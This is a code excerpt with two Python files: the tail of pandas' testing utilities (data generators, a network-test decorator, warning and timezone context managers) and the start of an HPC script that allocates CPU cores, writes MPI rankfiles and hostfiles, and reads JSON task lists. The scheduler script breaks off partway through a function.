iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
auto_running.py
|
import subprocess
import os
import time
import pandas
import glob
import tqdm
import logging
import heapq
import json
from re import search
import uuid
import multiprocessing as mp
import numpy as np
import time
from typing import List
class PriorityQueue:
"""
Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
"""
def __init__(self):
self.heap = []
self.count = 0
def push(self, item, priority):
entry = (priority, self.count, item)
heapq.heappush(self.heap, entry)
self.count += 1
def pop(self):
(_, _, item) = heapq.heappop(self.heap)
return item
def isEmpty(self):
return len(self.heap) == 0
def update(self, item, priority):
# If item already in priority queue with higher priority, update its priority and rebuild the heap.
# If item already in priority queue with equal or lower priority, do nothing.
# If item not in priority queue, do the same thing as self.push.
for index, (p, c, i) in enumerate(self.heap):
if i == item:
if p <= priority:
break
del self.heap[index]
self.heap.append((priority, c, item))
heapq.heapify(self.heap)
break
else:
self.push(item, priority)
hostfile_dir = '/nfs/cluster/hostfiles/'
output_dir = '/nfs/cluster/result'
ramble_binary = "/nfs/cluster/ramBLe_hpcx/ramble"
### for debugging only
# hostfile_dir = "F:\\"
FORMAT = '[%(status)-7s] %(method)-10s %(asctime)s %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger('task')
resource_lock = mp.Lock()
task_queue = PriorityQueue()
def can_allocate(n: int, cpu_resource_remain) -> bool:
"""
:param n: cpu cores
:return: whether remain cpu resources can allocate e
"""
# print(cpu_resource_remain)
resource_lock.acquire()
res = False
if n <= 32:
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) >= n:
res = True
break
elif n > 64:
res = sum([len(x) for x in cpu_resource_remain.values()]) >= n
else:
x = None
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) >= 32:
x = node
break
if x is not None:
for node in cpu_resource_remain.keys():
if node != x:
if len(cpu_resource_remain[node]) >= n - 32:
res = True
break
resource_lock.release()
return res
def generate_rankfile(n: int, filename: str, cpu_resource_remain) -> dict:
"""
:param n: core number to request
:param filename: hostfile path
:return: rankfile dict
"""
resource_lock.acquire()
rankfile_dict = {}
if n <= 32:
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) >= n:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node]))[:n])
cpu_resource_remain[node] -= rankfile_dict[node]
break
elif n > 64:
n_copied = n
for node in cpu_resource_remain.keys():
now_core_num = len(cpu_resource_remain[node])
if now_core_num == 0:
continue
if n_copied >= now_core_num:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node])))
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied -= now_core_num
else:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node]))[:n_copied])
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied = 0
break
else:
x = None
n_copied = n
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) == 32:
x = node
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node])))
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied -= 32
break
for node in cpu_resource_remain.keys():
if node != x:
if len(cpu_resource_remain[node]) >= n_copied:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node]))[:n_copied])
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied = 0
break
with open(filename, 'w') as f:
rank_count = 0
for node in rankfile_dict.keys():
for core in rankfile_dict[node]:
f.write("rank {rank_num}={hostname} slots={core_num}\n".format(rank_num=rank_count, hostname=node,
core_num=core))
rank_count += 1
resource_lock.release()
return rankfile_dict
def generate_hostfile(n: int, filename: str, cpu_resource_remain) -> dict:
"""
:param n: core number to request
:param filename: hostfile path
:return: hostfile dict
"""
resource_lock.acquire()
hostfile_dict = {}
for node in cpu_resource_remain.keys():
now_core_num = cpu_resource_remain[node]
if now_core_num == 0:
continue
if n > now_core_num:
hostfile_dict[node] = now_core_num
cpu_resource_remain[node] -= now_core_num
n -= now_core_num
else:
hostfile_dict[node] = n
cpu_resource_remain[node] -= n
n = 0
break
with open(filename, 'w') as f:
for node in hostfile_dict.keys():
f.write("{} slots={}\n".format(node, hostfile_dict[node]))
# print(cpu_resource_remain)
resource_lock.release()
return hostfile_dict
def finish_compute(slot_dict: dict, cpu_resource_remain):
"""
:param slot_dict: hostfile dict
:return:
"""
resource_lock.acquire()
for node in slot_dict.keys():
cpu_resource_remain[node] = cpu_resource_remain[node] | slot_dict[node]
# print(cpu_resource_remain)
resource_lock.release()
task_check_set = {"name", "input", "cores", "algorithm", "level", "flags", "sep", "n", "m", "repeat"}
def read_task_from_file(filename):
"""
:param filename: json task file name
input: "/nfs/scratch/C1_discretized.tsv" filepath
output: "/nfs/scratch/" result save dir
cores: 128 int
level: 0 int
flags: "-d" string like "-c -v -i -d"
sep: "$'\t'" means tab
n: 0 int
m: 0 int
repeat: 1 int
:return: task list
"""
global ramble_binary
global output_dir
with open(filename, 'r') as f:
file_json = json.load(f)
ramble_binary = file_json['ramble_binary']
output_dir = file_json['result_directory']
task_list = file_json['tasks']
# check task in task list have all
for index, task in enumerate(task_list):
if set(task.keys()) == task_check_set:
d = {"status": 'success', 'method': 'read file'}
logger.info("read task No.{} successfully".format(index), extra=d)
else:
d = {"status": 'failed', 'method': 'read file'}
logger.error("read task No.{} failed please check and try again".format(index), extra=d)
raise ValueError
return task_list
def generate_command(task: dict, cpu_resource_remain):
"""
allocate cpu resources and generate commands
:param task: single task dict from the json file
:return:
"""
